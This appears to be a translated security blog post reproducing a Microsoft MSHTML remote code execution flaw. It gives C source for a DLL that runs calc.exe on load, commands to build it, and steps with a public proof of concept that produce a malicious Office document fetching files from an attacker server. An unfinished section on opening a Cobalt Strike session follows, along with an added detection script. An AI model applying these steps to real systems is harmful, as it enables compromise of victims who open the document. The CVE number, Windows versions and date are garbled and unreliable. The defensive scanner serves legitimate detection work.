
Vulnerability Reproduction | CVE--40444 (Microsoft MSHTML Remote Code Execution Vulnerability)

Time: 2019-02-28 21:19:23


Author: 墨阳

Disclaimer: This article is for study and research only. Illegal activity is strictly prohibited, and any consequences are the sole responsibility of the user.

0x01 Preface

Microsoft's MSHTML engine contains a code execution vulnerability. An attacker crafts an Office document containing a malicious ActiveX control and lures the user into opening it, thereby achieving remote code execution. When ActiveX controls are enabled on the user's host, the attacker can take control of the victim's host through this vulnerability.

At present an exploit for this vulnerability has been made public; Microsoft has announced that in-the-wild exploitation has been detected and has released a patch.

Affected scope:

Windows Server, version 20H2 (Server Core Installation)
Windows Server, version (Server Core installation)
Windows Server (Server Core installation)
Windows Server
Windows Server (Server Core installation)
Windows Server
Windows Server (Server Core installation)
Windows Server
Windows Server R2 (Server Core installation)
Windows Server R2
Windows Server (Server Core installation)
Windows Server
Windows Server for x64-based Systems Service Pack 2 (Server Core installation)
Windows Server for x64-based Systems Service Pack 2
Windows Server 32-bit Systems Service Pack 2 (Server Core installation)
Windows Server 32-bit Systems Service Pack 2
Windows Server R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server R2 for x64-based Systems Service Pack 1
Windows RT 8.1
Windows 8.1 for x64-based systems
Windows 8.1 32-bit systems
Windows 7 for x64-based Systems Service Pack 1
Windows 7 32-bit Systems Service Pack 1
Windows 10 for x64-based Systems
Windows 10 32-bit Systems
Windows 10 Version 21H1 for x64-based Systems
Windows 10 Version 21H1 for ARM64-based Systems
Windows 10 Version 21H1 32-bit Systems
Windows 10 Version 20H2 for x64-based Systems
Windows 10 Version 20H2 for ARM64-based Systems
Windows 10 Version 20H2 32-bit Systems
Windows 10 Version for x64-based Systems
Windows 10 Version for ARM64-based Systems
Windows 10 Version 32-bit Systems
Windows 10 Version 1909 for x64-based Systems
Windows 10 Version 1909 for ARM64-based Systems
Windows 10 Version 1909 32-bit Systems
Windows 10 Version 1809 for x64-based Systems
Windows 10 Version 1809 for ARM64-based Systems
Windows 10 Version 1809 32-bit Systems
Windows 10 Version 1607 for x64-based Systems
Windows 10 Version 1607 32-bit Systems

0x02 Vulnerability Reproduction

1. Prepare the calc.c file:

#include <windows.h>
#include <stdlib.h>   /* system() */

/* Launch the calculator as a visible sign that the DLL was loaded */
void exec(void) {
    system("C:\\Windows\\System32\\calc.exe");
    return;
}

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved) {
    switch (fdwReason) {
        case DLL_PROCESS_ATTACH:
            exec();   /* runs once, when the DLL is loaded into the process */
            break;
        case DLL_THREAD_ATTACH:
            break;
        case DLL_THREAD_DETACH:
            break;
        case DLL_PROCESS_DETACH:
            break;
    }
    return TRUE;
}

2. Compile it to a DLL (install the MinGW cross-compiler first, then build):

sudo apt-get install gcc-mingw-w64
i686-w64-mingw32-gcc -shared calc.c -o calc.dll

3. Download the POC:

Download address: /lockedbyte/CVE--40444

Put the DLL file in the test directory, replacing the file that is already there.

4. Generate the docx document from the DLL file

sudo python3 exploit.py generate test/calc.dll http://<SRV IP>

This automatically generates the document, word.html and word.cab.

5. Start the web server

sudo python3 exploit.py host 80

The generated document is in the out directory. Upload it to the target machine and double-click to open it; the calculator pops up (with Defender turned off).
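As an added detection-side example (not part of the original post or the lockedbyte PoC), assuming, as in the public samples of this vulnerability, that the generated document reaches the remote word.html through an external oleObject relationship in the .docx package: a defender can triage inbound documents by scanning the package's .rels parts. The check below flags any oleObject relationship marked External and any Target using an mhtml: URL; the sample package, the host srv.example and the relationship id rId5 are constructed for the demonstration.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"

def suspicious_targets(docx_bytes):
    """Return (rels part, Target) pairs worth an analyst's attention:
    oleObject relationships marked External, and any Target with an
    mhtml: scheme (a URL scheme resolved by the MSHTML engine)."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as pkg:
        for name in pkg.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(pkg.read(name))
            for rel in root.iter(f"{{{RELS_NS}}}Relationship"):
                target = rel.get("Target", "")
                external_ole = (rel.get("TargetMode") == "External"
                                and rel.get("Type") == OLE_REL)
                if external_ole or re.match(r"(?i)^mhtml:", target):
                    hits.append((name, target))
    return hits

def build_sample_docx(external_ole):
    """Constructed minimal package (not a real Office file) with one
    oleObject relationship, either remote (external_ole=True) or embedded."""
    if external_ole:
        rel = (f'<Relationship Id="rId5" Type="{OLE_REL}" '
               f'Target="mhtml:http://srv.example/word.html" TargetMode="External"/>')
    else:
        rel = f'<Relationship Id="rId5" Type="{OLE_REL}" Target="embeddings/oleObject1.bin"/>'
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as pkg:
        pkg.writestr("[Content_Types].xml", "<Types/>")
        pkg.writestr("word/document.xml", "<document/>")
        pkg.writestr("word/_rels/document.xml.rels",
                     f'<Relationships xmlns="{RELS_NS}">{rel}</Relationships>')
    return buf.getvalue()

if __name__ == "__main__":
    for flag in (True, False):
        print("external" if flag else "embedded", suspicious_targets(build_sample_docx(flag)))
```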

0x03 Getting a CS Session

1. Generate a PowerShell command in CS

2. Modify the calc.c file:

0x04 Remediation

Microsoft has released a patch; official download address:

/update-guide/en-US/vulnerability/CVE--40444

0x05 Learn More About Security

Follow our security official account to learn more about security!!!
